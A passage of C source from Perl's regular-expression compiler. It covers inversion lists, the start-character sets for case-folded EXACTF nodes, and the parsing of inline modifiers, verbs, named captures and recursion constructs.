* up so are looking at b's complement. */
if (complement_b) {
/* The complement of nothing is everything, so <a> would have to have
* just one element, starting at zero (ending at infinity) */
if (len_b == 0) {
return (len_a == 1 && array_a[0] == 0);
}
if (array_b[0] == 0) {
/* Otherwise, to complement, we invert. Here, the first element is
* 0, just remove it. To do this, we just pretend the array starts
* one later */
array_b++;
len_b--;
}
else {
/* But if the first element is not zero, we pretend the list starts
* at the 0 that is always stored immediately before the array. */
array_b--;
len_b++;
}
}
return len_a == len_b
&& memEQ(array_a, array_b, len_a * sizeof(array_a[0]));
}
#endif
/*
* As best we can, determine the characters that can match the start of
* the given EXACTF-ish node. This is for use in creating ssc nodes, so there
* can be false positive matches
*
* Returns the invlist as a new SV*; it is the caller's responsibility to
* call SvREFCNT_dec() when done with it.
*/
STATIC SV*
S__make_exactf_invlist(pTHX_ RExC_state_t *pRExC_state, regnode *node)
{
dVAR;
const U8 * s = (U8*)STRING(node);
SSize_t bytelen = STR_LEN(node);
UV uc;
/* Start out big enough for 2 separate code points */
SV* invlist = _new_invlist(4);
PERL_ARGS_ASSERT__MAKE_EXACTF_INVLIST;
if (! UTF) {
uc = *s;
/* We punt and assume can match anything if the node begins
* with a multi-character fold. Things are complicated. For
* example, /ffi/i could match any of:
* "\N{LATIN SMALL LIGATURE FFI}"
* "\N{LATIN SMALL LIGATURE FF}I"
* "F\N{LATIN SMALL LIGATURE FI}"
* plus several other things; and making sure we have all the
* possibilities is hard. */
if (is_MULTI_CHAR_FOLD_latin1_safe(s, s + bytelen)) {
invlist = _add_range_to_invlist(invlist, 0, UV_MAX);
}
else {
/* Any Latin1 range character can potentially match any
* other depending on the locale, and in Turkic locales, U+130 and
* U+131 */
if (OP(node) == EXACTFL) {
_invlist_union(invlist, PL_Latin1, &invlist);
invlist = add_cp_to_invlist(invlist,
LATIN_SMALL_LETTER_DOTLESS_I);
invlist = add_cp_to_invlist(invlist,
LATIN_CAPITAL_LETTER_I_WITH_DOT_ABOVE);
}
else {
/* But otherwise, it matches at least itself. We can
* quickly tell if it has a distinct fold, and if so,
* it matches that as well */
invlist = add_cp_to_invlist(invlist, uc);
if (IS_IN_SOME_FOLD_L1(uc))
invlist = add_cp_to_invlist(invlist, PL_fold_latin1[uc]);
}
/* Some characters match above-Latin1 ones under /i. This
* is true of EXACTFL ones when the locale is UTF-8 */
if (HAS_NONLATIN1_SIMPLE_FOLD_CLOSURE(uc)
&& (! isASCII(uc) || (OP(node) != EXACTFAA
&& OP(node) != EXACTFAA_NO_TRIE)))
{
add_above_Latin1_folds(pRExC_state, (U8) uc, &invlist);
}
}
}
else { /* Pattern is UTF-8 */
U8 folded[UTF8_MAX_FOLD_CHAR_EXPAND * UTF8_MAXBYTES_CASE + 1] = { '\0' };
const U8* e = s + bytelen;
IV fc;
fc = uc = utf8_to_uvchr_buf(s, s + bytelen, NULL);
/* The only code points that aren't folded in a UTF EXACTFish
* node are are the problematic ones in EXACTFL nodes */
if (OP(node) == EXACTFL && is_PROBLEMATIC_LOCALE_FOLDEDS_START_cp(uc)) {
/* We need to check for the possibility that this EXACTFL
* node begins with a multi-char fold. Therefore we fold
* the first few characters of it so that we can make that
* check */
U8 *d = folded;
int i;
fc = -1;
for (i = 0; i < UTF8_MAX_FOLD_CHAR_EXPAND && s < e; i++) {
if (isASCII(*s)) {
*(d++) = (U8) toFOLD(*s);
if (fc < 0) { /* Save the first fold */
fc = *(d-1);
}
s++;
}
else {
STRLEN len;
UV fold = toFOLD_utf8_safe(s, e, d, &len);
if (fc < 0) { /* Save the first fold */
fc = fold;
}
d += len;
s += UTF8SKIP(s);
}
}
/* And set up so the code below that looks in this folded
* buffer instead of the node's string */
e = d;
s = folded;
}
/* When we reach here 's' points to the fold of the first
* character(s) of the node; and 'e' points to far enough along
* the folded string to be just past any possible multi-char
* fold.
*
* Unlike the non-UTF-8 case, the macro for determining if a
* string is a multi-char fold requires all the characters to
* already be folded. This is because of all the complications
* if not. Note that they are folded anyway, except in EXACTFL
* nodes. Like the non-UTF case above, we punt if the node
* begins with a multi-char fold */
if (is_MULTI_CHAR_FOLD_utf8_safe(s, e)) {
invlist = _add_range_to_invlist(invlist, 0, UV_MAX);
}
else { /* Single char fold */
unsigned int k;
unsigned int first_fold;
const unsigned int * remaining_folds;
Size_t folds_count;
/* It matches itself */
invlist = add_cp_to_invlist(invlist, fc);
/* ... plus all the things that fold to it, which are found in
* PL_utf8_foldclosures */
folds_count = _inverse_folds(fc, &first_fold,
&remaining_folds);
for (k = 0; k < folds_count; k++) {
UV c = (k == 0) ? first_fold : remaining_folds[k-1];
/* /aa doesn't allow folds between ASCII and non- */
if ( (OP(node) == EXACTFAA || OP(node) == EXACTFAA_NO_TRIE)
&& isASCII(c) != isASCII(fc))
{
continue;
}
invlist = add_cp_to_invlist(invlist, c);
}
if (OP(node) == EXACTFL) {
/* If either [iI] are present in an EXACTFL node the above code
* should have added its normal case pair, but under a Turkish
* locale they could match instead the case pairs from it. Add
* those as potential matches as well */
if (isALPHA_FOLD_EQ(fc, 'I')) {
invlist = add_cp_to_invlist(invlist,
LATIN_SMALL_LETTER_DOTLESS_I);
invlist = add_cp_to_invlist(invlist,
LATIN_CAPITAL_LETTER_I_WITH_DOT_ABOVE);
}
else if (fc == LATIN_SMALL_LETTER_DOTLESS_I) {
invlist = add_cp_to_invlist(invlist, 'I');
}
else if (fc == LATIN_CAPITAL_LETTER_I_WITH_DOT_ABOVE) {
invlist = add_cp_to_invlist(invlist, 'i');
}
}
}
}
return invlist;
}
#undef HEADER_LENGTH
#undef TO_INTERNAL_SIZE
#undef FROM_INTERNAL_SIZE
#undef INVLIST_VERSION_ID
/* End of inversion list object */
STATIC void
S_parse_lparen_question_flags(pTHX_ RExC_state_t *pRExC_state)
{
/* This parses the flags that are in either the '(?foo)' or '(?foo:bar)'
* constructs, and updates RExC_flags with them. On input, RExC_parse
* should point to the first flag; it is updated on output to point to the
* final ')' or ':'. There needs to be at least one flag, or this will
* abort */
/* for (?g), (?gc), and (?o) warnings; warning
about (?c) will warn about (?g) -- japhy */
#define WASTED_O 0x01
#define WASTED_G 0x02
#define WASTED_C 0x04
#define WASTED_GC (WASTED_G|WASTED_C)
I32 wastedflags = 0x00;
U32 posflags = 0, negflags = 0;
U32 *flagsp = &posflags;
char has_charset_modifier = '\0';
regex_charset cs;
bool has_use_defaults = FALSE;
const char* const seqstart = RExC_parse - 1; /* Point to the '?' */
int x_mod_count = 0;
PERL_ARGS_ASSERT_PARSE_LPAREN_QUESTION_FLAGS;
/* '^' as an initial flag sets certain defaults */
if (UCHARAT(RExC_parse) == '^') {
RExC_parse++;
has_use_defaults = TRUE;
STD_PMMOD_FLAGS_CLEAR(&RExC_flags);
cs = (RExC_uni_semantics)
? REGEX_UNICODE_CHARSET
: REGEX_DEPENDS_CHARSET;
set_regex_charset(&RExC_flags, cs);
}
else {
cs = get_regex_charset(RExC_flags);
if ( cs == REGEX_DEPENDS_CHARSET
&& RExC_uni_semantics)
{
cs = REGEX_UNICODE_CHARSET;
}
}
while (RExC_parse < RExC_end) {
/* && strchr("iogcmsx", *RExC_parse) */
/* (?g), (?gc) and (?o) are useless here
and must be globally applied -- japhy */
switch (*RExC_parse) {
/* Code for the imsxn flags */
CASE_STD_PMMOD_FLAGS_PARSE_SET(flagsp, x_mod_count);
case LOCALE_PAT_MOD:
if (has_charset_modifier) {
goto excess_modifier;
}
else if (flagsp == &negflags) {
goto neg_modifier;
}
cs = REGEX_LOCALE_CHARSET;
has_charset_modifier = LOCALE_PAT_MOD;
break;
case UNICODE_PAT_MOD:
if (has_charset_modifier) {
goto excess_modifier;
}
else if (flagsp == &negflags) {
goto neg_modifier;
}
cs = REGEX_UNICODE_CHARSET;
has_charset_modifier = UNICODE_PAT_MOD;
break;
case ASCII_RESTRICT_PAT_MOD:
if (flagsp == &negflags) {
goto neg_modifier;
}
if (has_charset_modifier) {
if (cs != REGEX_ASCII_RESTRICTED_CHARSET) {
goto excess_modifier;
}
/* Doubled modifier implies more restricted */
cs = REGEX_ASCII_MORE_RESTRICTED_CHARSET;
}
else {
cs = REGEX_ASCII_RESTRICTED_CHARSET;
}
has_charset_modifier = ASCII_RESTRICT_PAT_MOD;
break;
case DEPENDS_PAT_MOD:
if (has_use_defaults) {
goto fail_modifiers;
}
else if (flagsp == &negflags) {
goto neg_modifier;
}
else if (has_charset_modifier) {
goto excess_modifier;
}
/* The dual charset means unicode semantics if the
* pattern (or target, not known until runtime) are
* utf8, or something in the pattern indicates unicode
* semantics */
cs = (RExC_uni_semantics)
? REGEX_UNICODE_CHARSET
: REGEX_DEPENDS_CHARSET;
has_charset_modifier = DEPENDS_PAT_MOD;
break;
excess_modifier:
RExC_parse++;
if (has_charset_modifier == ASCII_RESTRICT_PAT_MOD) {
vFAIL2("Regexp modifier \"%c\" may appear a maximum of twice", ASCII_RESTRICT_PAT_MOD);
}
else if (has_charset_modifier == *(RExC_parse - 1)) {
vFAIL2("Regexp modifier \"%c\" may not appear twice",
*(RExC_parse - 1));
}
else {
vFAIL3("Regexp modifiers \"%c\" and \"%c\" are mutually exclusive", has_charset_modifier, *(RExC_parse - 1));
}
NOT_REACHED; /*NOTREACHED*/
neg_modifier:
RExC_parse++;
vFAIL2("Regexp modifier \"%c\" may not appear after the \"-\"",
*(RExC_parse - 1));
NOT_REACHED; /*NOTREACHED*/
case ONCE_PAT_MOD: /* 'o' */
case GLOBAL_PAT_MOD: /* 'g' */
if (ckWARN(WARN_REGEXP)) {
const I32 wflagbit = *RExC_parse == 'o'
? WASTED_O
: WASTED_G;
if (! (wastedflags & wflagbit) ) {
wastedflags |= wflagbit;
/* diag_listed_as: Useless (?-%s) - don't use /%s modifier in regex; marked by <-- HERE in m/%s/ */
vWARN5(
RExC_parse + 1,
"Useless (%s%c) - %suse /%c modifier",
flagsp == &negflags ? "?-" : "?",
*RExC_parse,
flagsp == &negflags ? "don't " : "",
*RExC_parse
);
}
}
break;
case CONTINUE_PAT_MOD: /* 'c' */
if (ckWARN(WARN_REGEXP)) {
if (! (wastedflags & WASTED_C) ) {
wastedflags |= WASTED_GC;
/* diag_listed_as: Useless (?-%s) - don't use /%s modifier in regex; marked by <-- HERE in m/%s/ */
vWARN3(
RExC_parse + 1,
"Useless (%sc) - %suse /gc modifier",
flagsp == &negflags ? "?-" : "?",
flagsp == &negflags ? "don't " : ""
);
}
}
break;
case KEEPCOPY_PAT_MOD: /* 'p' */
if (flagsp == &negflags) {
ckWARNreg(RExC_parse + 1,"Useless use of (?-p)");
} else {
*flagsp |= RXf_PMf_KEEPCOPY;
}
break;
case '-':
/* A flag is a default iff it is following a minus, so
* if there is a minus, it means will be trying to
* re-specify a default which is an error */
if (has_use_defaults || flagsp == &negflags) {
goto fail_modifiers;
}
flagsp = &negflags;
wastedflags = 0; /* reset so (?g-c) warns twice */
x_mod_count = 0;
break;
case ':':
case ')':
if ((posflags & (RXf_PMf_EXTENDED|RXf_PMf_EXTENDED_MORE)) == RXf_PMf_EXTENDED) {
negflags |= RXf_PMf_EXTENDED_MORE;
}
RExC_flags |= posflags;
if (negflags & RXf_PMf_EXTENDED) {
negflags |= RXf_PMf_EXTENDED_MORE;
}
RExC_flags &= ~negflags;
set_regex_charset(&RExC_flags, cs);
return;
default:
fail_modifiers:
RExC_parse += SKIP_IF_CHAR(RExC_parse, RExC_end);
/* diag_listed_as: Sequence (?%s...) not recognized in regex; marked by <-- HERE in m/%s/ */
vFAIL2utf8f("Sequence (%" UTF8f "...) not recognized",
UTF8fARG(UTF, RExC_parse-seqstart, seqstart));
NOT_REACHED; /*NOTREACHED*/
}
RExC_parse += UTF ? UTF8SKIP(RExC_parse) : 1;
}
vFAIL("Sequence (?... not terminated");
}
/*
- reg - regular expression, i.e. main body or parenthesized thing
*
* Caller must absorb opening parenthesis.
*
* Combining parenthesis handling with the base level of regular expression
* is a trifle forced, but the need to tie the tails of the branches to what
* follows makes it hard to avoid.
*/
#define REGTAIL(x,y,z) regtail((x),(y),(z),depth+1)
#ifdef DEBUGGING
#define REGTAIL_STUDY(x,y,z) regtail_study((x),(y),(z),depth+1)
#else
#define REGTAIL_STUDY(x,y,z) regtail((x),(y),(z),depth+1)
#endif
PERL_STATIC_INLINE regnode_offset
S_handle_named_backref(pTHX_ RExC_state_t *pRExC_state,
I32 *flagp,
char * parse_start,
char ch
)
{
regnode_offset ret;
char* name_start = RExC_parse;
U32 num = 0;
SV *sv_dat = reg_scan_name(pRExC_state, REG_RSN_RETURN_DATA);
GET_RE_DEBUG_FLAGS_DECL;
PERL_ARGS_ASSERT_HANDLE_NAMED_BACKREF;
if (RExC_parse == name_start || *RExC_parse != ch) {
/* diag_listed_as: Sequence \%s... not terminated in regex; marked by <-- HERE in m/%s/ */
vFAIL2("Sequence %.3s... not terminated", parse_start);
}
if (sv_dat) {
num = add_data( pRExC_state, STR_WITH_LEN("S"));
RExC_rxi->data->data[num]=(void*)sv_dat;
SvREFCNT_inc_simple_void_NN(sv_dat);
}
RExC_sawback = 1;
ret = reganode(pRExC_state,
((! FOLD)
? NREF
: (ASCII_FOLD_RESTRICTED)
? NREFFA
: (AT_LEAST_UNI_SEMANTICS)
? NREFFU
: (LOC)
? NREFFL
: NREFF),
num);
*flagp |= HASWIDTH;
Set_Node_Offset(REGNODE_p(ret), parse_start+1);
Set_Node_Cur_Length(REGNODE_p(ret), parse_start);
nextchar(pRExC_state);
return ret;
}
/* On success, returns the offset at which any next node should be placed into
* the regex engine program being compiled.
*
* Returns 0 otherwise, with *flagp set to indicate why:
* TRYAGAIN at the end of (?) that only sets flags.
* RESTART_PARSE if the parse needs to be restarted, or'd with
* NEED_UTF8 if the pattern needs to be upgraded to UTF-8.
* Otherwise would only return 0 if regbranch() returns 0, which cannot
* happen. */
STATIC regnode_offset
S_reg(pTHX_ RExC_state_t *pRExC_state, I32 paren, I32 *flagp, U32 depth)
/* paren: Parenthesized? 0=top; 1,2=inside '(': changed to letter.
* 2 is like 1, but indicates that nextchar() has been called to advance
* RExC_parse beyond the '('. Things like '(?' are indivisible tokens, and
* this flag alerts us to the need to check for that */
{
regnode_offset ret = 0; /* Will be the head of the group. */
regnode_offset br;
regnode_offset lastbr;
regnode_offset ender = 0;
I32 parno = 0;
I32 flags;
U32 oregflags = RExC_flags;
bool have_branch = 0;
bool is_open = 0;
I32 freeze_paren = 0;
I32 after_freeze = 0;
I32 num; /* numeric backreferences */
SV * max_open; /* Max number of unclosed parens */
char * parse_start = RExC_parse; /* MJD */
char * const oregcomp_parse = RExC_parse;
GET_RE_DEBUG_FLAGS_DECL;
PERL_ARGS_ASSERT_REG;
DEBUG_PARSE("reg ");
max_open = get_sv(RE_COMPILE_RECURSION_LIMIT, GV_ADD);
assert(max_open);
if (!SvIOK(max_open)) {
sv_setiv(max_open, RE_COMPILE_RECURSION_INIT);
}
if (depth > 4 * (UV) SvIV(max_open)) { /* We increase depth by 4 for each
open paren */
vFAIL("Too many nested open parens");
}
*flagp = 0; /* Tentatively. */
/* Having this true makes it feasible to have a lot fewer tests for the
* parse pointer being in scope. For example, we can write
* while(isFOO(*RExC_parse)) RExC_parse++;
* instead of
* while(RExC_parse < RExC_end && isFOO(*RExC_parse)) RExC_parse++;
*/
assert(*RExC_end == '\0');
/* Make an OPEN node, if parenthesized. */
if (paren) {
/* Under /x, space and comments can be gobbled up between the '(' and
* here (if paren ==2). The forms '(*VERB' and '(?...' disallow such
* intervening space, as the sequence is a token, and a token should be
* indivisible */
bool has_intervening_patws = (paren == 2)
&& *(RExC_parse - 1) != '(';
if (RExC_parse >= RExC_end) {
vFAIL("Unmatched (");
}
if (paren == 'r') { /* Atomic script run */
paren = '>';
goto parse_rest;
}
else if ( *RExC_parse == '*') { /* (*VERB:ARG), (*construct:...) */
char *start_verb = RExC_parse + 1;
STRLEN verb_len;
char *start_arg = NULL;
unsigned char op = 0;
int arg_required = 0;
int internal_argval = -1; /* if >-1 we are not allowed an argument*/
bool has_upper = FALSE;
if (has_intervening_patws) {
RExC_parse++; /* past the '*' */
/* For strict backwards compatibility, don't change the message
* now that we also have lowercase operands */
if (isUPPER(*RExC_parse)) {
vFAIL("In '(*VERB...)', the '(' and '*' must be adjacent");
}
else {
vFAIL("In '(*...)', the '(' and '*' must be adjacent");
}
}
while (RExC_parse < RExC_end && *RExC_parse != ')' ) {
if ( *RExC_parse == ':' ) {
start_arg = RExC_parse + 1;
break;
}
else if (! UTF) {
if (isUPPER(*RExC_parse)) {
has_upper = TRUE;
}
RExC_parse++;
}
else {
RExC_parse += UTF8SKIP(RExC_parse);
}
}
verb_len = RExC_parse - start_verb;
if ( start_arg ) {
if (RExC_parse >= RExC_end) {
goto unterminated_verb_pattern;
}
RExC_parse += UTF ? UTF8SKIP(RExC_parse) : 1;
while ( RExC_parse < RExC_end && *RExC_parse != ')' ) {
RExC_parse += UTF ? UTF8SKIP(RExC_parse) : 1;
}
if ( RExC_parse >= RExC_end || *RExC_parse != ')' ) {
unterminated_verb_pattern:
if (has_upper) {
vFAIL("Unterminated verb pattern argument");
}
else {
vFAIL("Unterminated '(*...' argument");
}
}
} else {
if ( RExC_parse >= RExC_end || *RExC_parse != ')' ) {
if (has_upper) {
vFAIL("Unterminated verb pattern");
}
else {
vFAIL("Unterminated '(*...' construct");
}
}
}
/* Here, we know that RExC_parse < RExC_end */
switch ( *start_verb ) {
case 'A': /* (*ACCEPT) */
if ( memEQs(start_verb, verb_len,"ACCEPT") ) {
op = ACCEPT;
internal_argval = RExC_nestroot;
}
break;
case 'C': /* (*COMMIT) */
if ( memEQs(start_verb, verb_len,"COMMIT") )
op = COMMIT;
break;
case 'F': /* (*FAIL) */
if ( verb_len==1 || memEQs(start_verb, verb_len,"FAIL") ) {
op = OPFAIL;
}
break;
case ':': /* (*:NAME) */
case 'M': /* (*MARK:NAME) */
if ( verb_len==0 || memEQs(start_verb, verb_len,"MARK") ) {
op = MARKPOINT;
arg_required = 1;
}
break;
case 'P': /* (*PRUNE) */
if ( memEQs(start_verb, verb_len,"PRUNE") )
op = PRUNE;
break;
case 'S': /* (*SKIP) */
if ( memEQs(start_verb, verb_len,"SKIP") )
op = SKIP;
break;
case 'T': /* (*THEN) */
/* [19:06] <TimToady> :: is then */
if ( memEQs(start_verb, verb_len,"THEN") ) {
op = CUTGROUP;
RExC_seen |= REG_CUTGROUP_SEEN;
}
break;
case 'a':
if ( memEQs(start_verb, verb_len, "asr")
|| memEQs(start_verb, verb_len, "atomic_script_run"))
{
paren = 'r'; /* Mnemonic: recursed run */
goto script_run;
}
else if (memEQs(start_verb, verb_len, "atomic")) {
paren = 't'; /* AtOMIC */
goto alpha_assertions;
}
break;
case 'p':
if ( memEQs(start_verb, verb_len, "plb")
|| memEQs(start_verb, verb_len, "positive_lookbehind"))
{
paren = 'b';
goto lookbehind_alpha_assertions;
}
else if ( memEQs(start_verb, verb_len, "pla")
|| memEQs(start_verb, verb_len, "positive_lookahead"))
{
paren = 'a';
goto alpha_assertions;
}
break;
case 'n':
if ( memEQs(start_verb, verb_len, "nlb")
|| memEQs(start_verb, verb_len, "negative_lookbehind"))
{
paren = 'B';
goto lookbehind_alpha_assertions;
}
else if ( memEQs(start_verb, verb_len, "nla")
|| memEQs(start_verb, verb_len, "negative_lookahead"))
{
paren = 'A';
goto alpha_assertions;
}
break;
case 's':
if ( memEQs(start_verb, verb_len, "sr")
|| memEQs(start_verb, verb_len, "script_run"))
{
regnode_offset atomic;
paren = 's';
script_run:
/* This indicates Unicode rules. */
REQUIRE_UNI_RULES(flagp, 0);
if (! start_arg) {
goto no_colon;
}
RExC_parse = start_arg;
if (RExC_in_script_run) {
/* Nested script runs are treated as no-ops, because
* if the nested one fails, the outer one must as
* well. It could fail sooner, and avoid (??{} with
* side effects, but that is explicitly documented as
* undefined behavior. */
ret = 0;
if (paren == 's') {
paren = ':';
goto parse_rest;
}
/* But, the atomic part of a nested atomic script run
* isn't a no-op, but can be treated just like a '(?>'
* */
paren = '>';
goto parse_rest;
}
/* By doing this here, we avoid extra warnings for nested
* script runs */
ckWARNexperimental(RExC_parse,
WARN_EXPERIMENTAL__SCRIPT_RUN,
"The script_run feature is experimental");
if (paren == 's') {
/* Here, we're starting a new regular script run */
ret = reg_node(pRExC_state, SROPEN);
RExC_in_script_run = 1;
is_open = 1;
goto parse_rest;
}
/* Here, we are starting an atomic script run. This is
* handled by recursing to deal with the atomic portion
* separately, enclosed in SROPEN ... SRCLOSE nodes */
ret = reg_node(pRExC_state, SROPEN);
RExC_in_script_run = 1;
atomic = reg(pRExC_state, 'r', &flags, depth);
if (flags & (RESTART_PARSE|NEED_UTF8)) {
*flagp = flags & (RESTART_PARSE|NEED_UTF8);
return 0;
}
if (! REGTAIL(pRExC_state, ret, atomic)) {
REQUIRE_BRANCHJ(flagp, 0);
}
if (! REGTAIL(pRExC_state, atomic, reg_node(pRExC_state,
SRCLOSE)))
{
REQUIRE_BRANCHJ(flagp, 0);
}
RExC_in_script_run = 0;
return ret;
}
break;
lookbehind_alpha_assertions:
RExC_seen |= REG_LOOKBEHIND_SEEN;
RExC_in_lookbehind++;
/*FALLTHROUGH*/
alpha_assertions:
ckWARNexperimental(RExC_parse,
WARN_EXPERIMENTAL__ALPHA_ASSERTIONS,
"The alpha_assertions feature is experimental");
RExC_seen_zerolen++;
if (! start_arg) {
goto no_colon;
}
/* An empty negative lookahead assertion simply is failure */
if (paren == 'A' && RExC_parse == start_arg) {
ret=reganode(pRExC_state, OPFAIL, 0);
nextchar(pRExC_state);
return ret;
}
RExC_parse = start_arg;
goto parse_rest;
no_colon:
vFAIL2utf8f(
"'(*%" UTF8f "' requires a terminating ':'",
UTF8fARG(UTF, verb_len, start_verb));
NOT_REACHED; /*NOTREACHED*/
} /* End of switch */
if ( ! op ) {
RExC_parse += UTF
? UTF8_SAFE_SKIP(RExC_parse, RExC_end)
: 1;
if (has_upper || verb_len == 0) {
vFAIL2utf8f(
"Unknown verb pattern '%" UTF8f "'",
UTF8fARG(UTF, verb_len, start_verb));
}
else {
vFAIL2utf8f(
"Unknown '(*...)' construct '%" UTF8f "'",
UTF8fARG(UTF, verb_len, start_verb));
}
}
if ( RExC_parse == start_arg ) {
start_arg = NULL;
}
if ( arg_required && !start_arg ) {
vFAIL3("Verb pattern '%.*s' has a mandatory argument",
verb_len, start_verb);
}
if (internal_argval == -1) {
ret = reganode(pRExC_state, op, 0);
} else {
ret = reg2Lanode(pRExC_state, op, 0, internal_argval);
}
RExC_seen |= REG_VERBARG_SEEN;
if (start_arg) {
SV *sv = newSVpvn( start_arg,
RExC_parse - start_arg);
ARG(REGNODE_p(ret)) = add_data( pRExC_state,
STR_WITH_LEN("S"));
RExC_rxi->data->data[ARG(REGNODE_p(ret))]=(void*)sv;
FLAGS(REGNODE_p(ret)) = 1;
} else {
FLAGS(REGNODE_p(ret)) = 0;
}
if ( internal_argval != -1 )
ARG2L_SET(REGNODE_p(ret), internal_argval);
nextchar(pRExC_state);
return ret;
}
else if (*RExC_parse == '?') { /* (?...) */
bool is_logical = 0;
const char * const seqstart = RExC_parse;
const char * endptr;
if (has_intervening_patws) {
RExC_parse++;
vFAIL("In '(?...)', the '(' and '?' must be adjacent");
}
RExC_parse++; /* past the '?' */
paren = *RExC_parse; /* might be a trailing NUL, if not
well-formed */
RExC_parse += UTF ? UTF8SKIP(RExC_parse) : 1;
if (RExC_parse > RExC_end) {
paren = '\0';
}
ret = 0; /* For look-ahead/behind. */
switch (paren) {
case 'P': /* (?P...) variants for those used to PCRE/Python */
paren = *RExC_parse;
if ( paren == '<') { /* (?P<...>) named capture */
RExC_parse++;
if (RExC_parse >= RExC_end) {
vFAIL("Sequence (?P<... not terminated");
}
goto named_capture;
}
else if (paren == '>') { /* (?P>name) named recursion */
RExC_parse++;
if (RExC_parse >= RExC_end) {
vFAIL("Sequence (?P>... not terminated");
}
goto named_recursion;
}
else if (paren == '=') { /* (?P=...) named backref */
RExC_parse++;
return handle_named_backref(pRExC_state, flagp,
parse_start, ')');
}
RExC_parse += SKIP_IF_CHAR(RExC_parse, RExC_end);
/* diag_listed_as: Sequence (?%s...) not recognized in regex; marked by <-- HERE in m/%s/ */
vFAIL3("Sequence (%.*s...) not recognized",
RExC_parse-seqstart, seqstart);
NOT_REACHED; /*NOTREACHED*/
case '<': /* (?<...) */
if (*RExC_parse == '!')
paren = ',';
else if (*RExC_parse != '=')
named_capture:
{ /* (?<...>) */
char *name_start;
SV *svname;
paren= '>';
/* FALLTHROUGH */
case '\'': /* (?'...') */
name_start = RExC_parse;
svname = reg_scan_name(pRExC_state, REG_RSN_RETURN_NAME);
if ( RExC_parse == name_start
|| RExC_parse >= RExC_end
|| *RExC_parse != paren)
{
vFAIL2("Sequence (?%c... not terminated",
paren=='>' ? '<' : paren);
}
{
HE *he_str;
SV *sv_dat = NULL;
if (!svname) /* shouldn't happen */
Perl_croak(aTHX_
"panic: reg_scan_name returned NULL");
if (!RExC_paren_names) {
RExC_paren_names= newHV();
sv_2mortal(MUTABLE_SV(RExC_paren_names));
#ifdef DEBUGGING
RExC_paren_name_list= newAV();
sv_2mortal(MUTABLE_SV(RExC_paren_name_list));
#endif
}
he_str = hv_fetch_ent( RExC_paren_names, svname, 1, 0 );
if ( he_str )
sv_dat = HeVAL(he_str);
if ( ! sv_dat ) {
/* croak baby croak */
Perl_croak(aTHX_
"panic: paren_name hash element allocation failed");
} else if ( SvPOK(sv_dat) ) {
/* (?|...) can mean we have dupes so scan to check
its already been stored. Maybe a flag indicating
we are inside such a construct would be useful,
but the arrays are likely to be quite small, so
for now we punt -- dmq */
IV count = SvIV(sv_dat);
I32 *pv = (I32*)SvPVX(sv_dat);
IV i;
for ( i = 0 ; i < count ; i++ ) {
if ( pv[i] == RExC_npar ) {
count = 0;
break;
}
}
if ( count ) {
pv = (I32*)SvGROW(sv_dat,
SvCUR(sv_dat) + sizeof(I32)+1);
SvCUR_set(sv_dat, SvCUR(sv_dat) + sizeof(I32));
pv[count] = RExC_npar;
SvIV_set(sv_dat, SvIVX(sv_dat) + 1);
}
} else {
(void)SvUPGRADE(sv_dat, SVt_PVNV);
sv_setpvn(sv_dat, (char *)&(RExC_npar),
sizeof(I32));
SvIOK_on(sv_dat);
SvIV_set(sv_dat, 1);
}
#ifdef DEBUGGING
/* Yes this does cause a memory leak in debugging Perls
* */
if (!av_store(RExC_paren_name_list,
RExC_npar, SvREFCNT_inc_NN(svname)))
SvREFCNT_dec_NN(svname);
#endif
/*sv_dump(sv_dat);*/
}
nextchar(pRExC_state);
paren = 1;
goto capturing_parens;
}
RExC_seen |= REG_LOOKBEHIND_SEEN;
RExC_in_lookbehind++;
RExC_parse++;
if (RExC_parse >= RExC_end) {
vFAIL("Sequence (?... not terminated");
}
/* FALLTHROUGH */
case '=': /* (?=...) */
RExC_seen_zerolen++;
break;
case '!': /* (?!...) */
RExC_seen_zerolen++;
/* check if we're really just a "FAIL" assertion */
skip_to_be_ignored_text(pRExC_state, &RExC_parse,
FALSE /* Don't force to /x */ );
if (*RExC_parse == ')') {
ret=reganode(pRExC_state, OPFAIL, 0);
nextchar(pRExC_state);
return ret;
}
break;
case '|': /* (?|...) */
/* branch reset, behave like a (?:...) except that
buffers in alternations share the same numbers */
paren = ':';
after_freeze = freeze_paren = RExC_npar;
/* XXX This construct currently requires an extra pass.
* Investigation would be required to see if that could be
* changed */
REQUIRE_PARENS_PASS;
break;
case ':': /* (?:...) */
case '>': /* (?>...) */
break;
case '$': /* (?$...) */
case '@': /* (?@...) */
vFAIL2("Sequence (?%c...) not implemented", (int)paren);
break;
case '0' : /* (?0) */
case 'R' : /* (?R) */
if (RExC_parse == RExC_end || *RExC_parse != ')')
FAIL("Sequence (?R) not terminated");
num = 0;
RExC_seen |= REG_RECURSE_SEEN;
/* XXX These constructs currently require an extra pass.
* It probably could be changed */
REQUIRE_PARENS_PASS;
*flagp |= POSTPONED;
goto gen_recurse_regop;
/*notreached*/
/* named and numeric backreferences */
case '&': /* (?&NAME) */
parse_start = RExC_parse - 1;
named_recursion:
{
SV *sv_dat = reg_scan_name(pRExC_state,
REG_RSN_RETURN_DATA);
num = sv_dat ? *((I32 *)SvPVX(sv_dat)) : 0;
}
if (RExC_parse >= RExC_end || *RExC_parse != ')')
vFAIL("Sequence (?&... not terminated");
goto gen_recurse_regop;
/* NOTREACHED */
case '+':
if (! inRANGE(RExC_parse[0], '1', '9')) {
RExC_parse++;
vFAIL("Illegal pattern");
}
goto parse_recursion;
/* NOTREACHED*/
case '-': /* (?-1) */
if (! inRANGE(RExC_parse[0], '1', '9')) {
RExC_parse--; /* rewind to let it be handled later */
goto parse_flags;
}
/* FALLTHROUGH */
case '1': case '2': case '3': case '4': /* (?1) */
case '5': case '6': case '7': case '8': case '9':
RExC_parse = (char *) seqstart + 1; /* Point to the digit */
parse_recursion:
{
bool is_neg = FALSE;
UV unum;
parse_start = RExC_parse - 1; /* MJD */
if (*RExC_parse == '-') {
RExC_parse++;
is_neg = TRUE;
}
endptr = RExC_end;
if (grok_atoUV(RExC_parse, &unum, &endptr)
&& unum <= I32_MAX
) {
num = (I32)unum;
RExC_parse = (char*)endptr;
} else
num = I32_MAX;
if (is_neg) {
/* Some limit for num? */
num = -num;
}
}
if (*RExC_parse!=')')
vFAIL("Expecting close bracket");
gen_recurse_regop:
if ( paren == '-' ) {
/*
Diagram of capture buffer numbering.
Top line is the normal capture buffer numbers
Bottom line is the negative indexing as from
the X (the (?-2))
+ 1 2 3 4 5 X 6 7
/(a(x)y)(a(b(c(?-2)d)e)f)(g(h))/
- 5 4 3 2 1 X x x
*/
num = RExC_npar + num;
if (num < 1) {
/* It might be a forward reference; we can't fail until
